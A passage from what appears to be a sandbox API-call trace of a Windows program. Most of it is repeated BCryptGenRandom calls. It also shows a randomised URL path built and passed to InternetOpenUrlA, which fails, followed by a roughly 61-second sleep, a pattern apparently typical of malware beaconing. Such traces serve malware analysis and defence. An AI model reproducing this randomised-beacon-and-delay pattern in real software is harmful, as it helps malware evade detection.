lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0190.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d636e, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4d636e) returned 0x0 [0190.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0190.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.137] GetProcessHeap () returned 0x440000 [0191.137] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0191.137] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0191.137] lstrcatA (in: lpString1="\x04", lpString2="/aekokLwogmlyxyVTg653tv3Hsd5lhepu50E9fa/7juTaqrj9eaow5geuqsia6fk50jszguqwM3apE9u/2lz624nn0Lnlpwudjg2rqohzisyy/5Z5b5dwjUkrXgft7bg5xd7aDra/" | out: lpString1="\x04/aekokLwogmlyxyVTg653tv3Hsd5lhepu50E9fa/7juTaqrj9eaow5geuqsia6fk50jszguqwM3apE9u/2lz624nn0Lnlpwudjg2rqohzisyy/5Z5b5dwjUkrXgft7bg5xd7aDra/") returned="\x04/aekokLwogmlyxyVTg653tv3Hsd5lhepu50E9fa/7juTaqrj9eaow5geuqsia6fk50jszguqwM3apE9u/2lz624nn0Lnlpwudjg2rqohzisyy/5Z5b5dwjUkrXgft7bg5xd7aDra/" [0191.137] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0191.137] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/aekokLwogmlyxyVTg653tv3Hsd5lhepu50E9fa/7juTaqrj9eaow5geuqsia6fk50jszguqwM3apE9u/2lz624nn0Lnlpwudjg2rqohzisyy/5Z5b5dwjUkrXgft7bg5xd7aDra/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0191.138] GetProcessHeap () returned 0x440000 [0191.138] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0191.138] GetProcessHeap () returned 0x440000 [0191.138] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d6300 | out: hHeap=0x440000) returned 1 [0191.138] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0191.138] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0191.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0191.139] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0191.139] Sleep (dwMilliseconds=0xee36) [0191.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0191.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.361] GetProcessHeap () returned 0x440000 [0191.361] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d6090 [0191.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6091, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x4d6091) returned 0x0 [0191.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d60a4, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x4d60a4) returned 0x0 [0191.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0191.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 